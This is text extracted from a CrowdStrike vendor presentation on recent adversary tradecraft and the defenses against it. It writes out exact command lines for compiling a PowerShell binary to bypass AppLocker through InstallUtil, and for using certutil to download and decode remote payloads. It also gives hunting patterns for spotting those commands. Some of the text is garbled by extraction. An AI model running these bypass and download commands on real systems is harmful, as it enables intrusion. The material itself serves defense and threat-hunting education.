LEARNING FROM HIGH-PROFILE BREACHES AND STOPPING THE NEXT ONE DAN LARSON –VP OF PRODUCT, CROWDSTRIKE
CROWD-SOURCED CLOUD-BASED 150B CAPTURE INDICATORS OF Events/ day COMPROMISE 109 ENRICH Adversaries tracked 25,000 HUNT INDICATORS Breaches OF ATTACK prevented/ year 3.5 million PROTECT IOA decisions/sec ARTIFICIAL INTELLIGENCE & MACHINE LEARNING
LAT E S T AD V E R S AR Y T R AD E C R AF T
C A T E G O R Y : CREDENTIAL THEFT D E L I V E R Y : STRATEGIC WEB COMPROMISE USING SMB
TECHNICAL BREAKDOWN VARIATIONS OF REMOTE SOURCE Javascript + Dean Edwards Packer obfuscation Tiny image Hidden in JQuery related Javascript files
REAL WORLD EXAMPLES MASSIVE BERSERK BEAR CREDENTIAL HARVESTING CAMPAIGN TARGETED NUMEROUS SECTORS Chemical – Sept 201 7 Financial – Sept 201 7 Hospitality – Sept 201 7 Oil & Gas – April 201 7 Technology – April 201 7 Engineering – April 201 7 Education – April 201 7
REAL WORLD EXAMPLES Another variation used spear-phishing emails. Word Docs contain code that attempts to retrieve doc template from remote source over WebDAV
� � � REAL WORLD EXAMPLES POST HARVESTING ACTIVITY Offline hash cracking Pass the hash tools Public facing services most vulnerable � Webmail � VPN � Remote conferencing software
� � � � � COUNTERMEASURES Implement Two-Factor Authentication (2FA) Restrict or monitor SMB connectivity to remote servers Robust password policies (length/ duration/ reuse) Restrict or monitor remote user authentication Leverage threat intel to track known SMB C2s
C A T E G O R Y : WHITELISTING BYPASS D E L I V E R Y : INSTALLUTIL
� � � � TECHNICAL BREAKDOWN InstallUtil CLI tool for install/uninstall of apps Part of .NET framework MS signed binary inside the Windows directory – handy for bypassing whitelists Discovered by @subTee, who also created C# code that can be used in combination to bypass Applocker restriction of PowerShell
TECHNICAL BREAKDOWN 1 . Use InstallUtil-PowerShell.cs and System.Management.Automation.dll to compile a special PowerShell executable / w csc.exe csc.exe / reference: System.Management.Automation.dll / out:powershell.exe InstallUtil-PowerShell.cs 2. Execute PowerShell binary with InstallUtil InstallUtil.exe / logfile= / LogToConsole=false / U powershell.exe
� � � � � REAL WORLD EXAMPLES Seen in Oct 201 7, January 201 8 ��������������������������������������������� InstallUtil.exe" / run= / logfile= / LogToConsole=false / u "C:\ Windows\ Microsoft.NET\ Framework\ v4.0. 9\ WPF\ wpf-etw.dat � 3031 Consistent with QuasarRATpublic reporting https:/ / www.pwc.co.uk/ cyber- security/ pdf/ cloud-hopper-annex-b- final.pdf InstallUtil.exe" / LogFile= / LogToConsole=false / u C:\ Windows\ System32\ CatRoot\ {1 27D0A1 D- 4EF2-1 1 D1 -8608-00C04FC295EE}\ HECI.cat - inputFormat xml -outputFormat text Chinese Adversary
� � COUNTERMEASURES In many environments InstallUtil is rarely used Consider blocking its execution If needed, try to monitor its usage instead and compare arguments against historical usage � Weak hunting indicator: FileName=installutil.exe AND CommandLine=*LogToConsole= false / u*
C A T E G O R Y : DEPLOYMENT OF RECON TOOLS D E L I V E R Y : CERTUTIL + EXPAND + CSVDE
� � � � � � � TECHNICAL BREAKDOWN CERTUTIL CSVDE A built-in Windows command-line Windows Server command-line program that is installed as part of program that is installed as part of AD Certificate Services DS and AD LDS Tools feature Also has the ability to download NOT included with Client OS remote file (-urlcache flag) and Can be used to enumerate AD decode base64 files (-decode flag) environment Great for downloading malware! EXPAND A built-in Windows command-line program to decompress CAB files
TECHNICAL BREAKDOWN Using CSVDE to enumerate Active Directory to disk � csvde.exe –f out.csv Here is a subset of the data returned. I couldn’t fit it all, over 370 fields!
REAL WORLD EXAMPLES � Seen in Aug and Nov 201 7 � certutil.exe -decode KB[REDACTED].log KB[REDACTED].log � expand KB[REDACTED].log csvde.exe � Chinese Adversary � Seen in Feb 201 8 � certutil.exe -urlcache -split -f http:/ / xx.xx.xx.xx/ news/ n4.jpg C:\ Users\ [REDACTED]\ AppData\ Local\ Temp\ 8\ index.zip
� � � � � COUNTERMEASURES � Certutil is rarely used with the aforementioned d command line args Consider blocking its execution If needed, try to monitor its usage instead and compare arguments against historical usage Weak hunting indicator: FileName=certutil.exe AND CommandLine=*-urlcache –split –f* Weak hunting indicator: FileName=certutil.exe AND CommandLine=*-decode* � CSVDE is not found on client version of Windows, can be blocked or monitored for hunting indicator on non Server systems Weak hunting indicator: FileName=csvde.exe AND Type!=Server
SPEED IS EVERYTHING: THE 1-10-60 RULE
1 HOUR 58 MINUTES BREAKOUT TIME Avg. time for an intruder to begin moving laterally to other systems in the network
SURVIVAL OF THE FASTEST: THE 1-10-60 RULE TIME TO TIME TO TIME TO REMEDIATE DETECT INVESTIGATE & CONTAIN 1 MIN 1 0 MIN 60 MIN ��������������������������������������������
SURVIVAL OF THE FASTEST: THE 1-10-60 RULE KEYS TO SUCCESS: � ARTIFICIAL INTELLIGENCE & MACHINE LEARNING � INDICATORS OF ATTACK � CLOUD-NATIVE ARCHITECTURE TIME TO DETECT 1 MIN ��������������������������������������������
SURVIVAL OF THE FASTEST: THE 1-10-60 RULE KEYS TO SUCCESS : � ENDPOINT DETECTION & RESPONSE � THREAT INTELLIGENCE � HUNTING TEAM TIME TO INVESTIGATE 1 0 MIN ��������������������������������������������
SURVIVAL OF THE FASTEST: THE 1-10-60 RULE KEYS TO SUCCESS : � CLOUD-BASED REMOTE DEVICE MANAGEMENT � PROACTIVE PLANNING & PREP � GOOD BUSINESS PROCESSES & TIME TO COMMUNICATION REMEDIATE & CONTAIN 60 MIN ��������������������������������������������
������������������������� THE POWER OF ONE ������������� ��������������� ��������� ������������ �������� ������� ������� �� �������������� ������ ��������� �������� ������� ������� ������� ���������� ����� ������ ������� ����������������� ����������������� ������������������� ������������������� ������������������� ������������������� ��������������� ����������������������� ����������� ���������
TRY IT FOR YOURSELF: crowdstrike.com/freetrial
Recommend
More recommend
